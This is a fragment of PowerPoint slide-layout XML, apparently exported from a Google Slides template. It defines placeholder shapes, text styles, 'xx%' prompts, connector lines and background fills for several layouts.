          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7587533" y="2883597"/>
            <a:ext cx="3272000" cy="3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72" name="Google Shape;72;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7587533" y="5210331"/>
            <a:ext cx="3272000" cy="3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73" name="Google Shape;73;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="2931733"/>
            <a:ext cx="4555200" cy="70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4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49621036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bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 74"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Google Shape;75;p14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1087317" y="3994300"/>
            <a:ext cx="811200" cy="536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2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Google Shape;76;p14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2177917" y="3909067"/>
            <a:ext cx="3911200" cy="43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77" name="Google Shape;77;p14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2177917" y="4276472"/>
            <a:ext cx="3911200" cy="67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78" name="Google Shape;78;p14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="-26500" y="-17781"/>
            <a:ext cx="12270800" cy="3586800"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 49898"/>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14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1087317" y="5185000"/>
            <a:ext cx="811200" cy="536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2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Google Shape;80;p14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2177917" y="5099761"/>
            <a:ext cx="3911200" cy="43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81" name="Google Shape;81;p14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2177917" y="5467167"/>
            <a:ext cx="3911200" cy="67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82" name="Google Shape;82;p14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="6" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6058500" y="3994300"/>
            <a:ext cx="811200" cy="536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2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;83;p14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7193547" y="3909067"/>
            <a:ext cx="3911200" cy="43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84" name="Google Shape;84;p14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7193547" y="4276472"/>
            <a:ext cx="3911200" cy="67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85" name="Google Shape;85;p14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="9" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6058500" y="5185000"/>
            <a:ext cx="811200" cy="536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2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Google Shape;86;p14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7193547" y="5099763"/>
            <a:ext cx="3911200" cy="43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87" name="Google Shape;87;p14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7193547" y="5467168"/>
            <a:ext cx="3911200" cy="67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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="88" name="Google Shape;88;p14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="-2989300" y="2546300"/>
            <a:ext cx="6426400" cy="5892800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="89" name="Google Shape;89;p14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="8754900" y="2507000"/>
            <a:ext cx="6426400" cy="5892800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Google Shape;90;p14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="707633"/>
            <a:ext cx="102812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lt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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="374426616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accent5"/>
        </a:soli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1242267" y="2692957"/>
            <a:ext cx="4337200" cy="133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4533" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Google Shape;103;p16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1242267" y="1289407"/>
            <a:ext cx="4076400" cy="129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8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
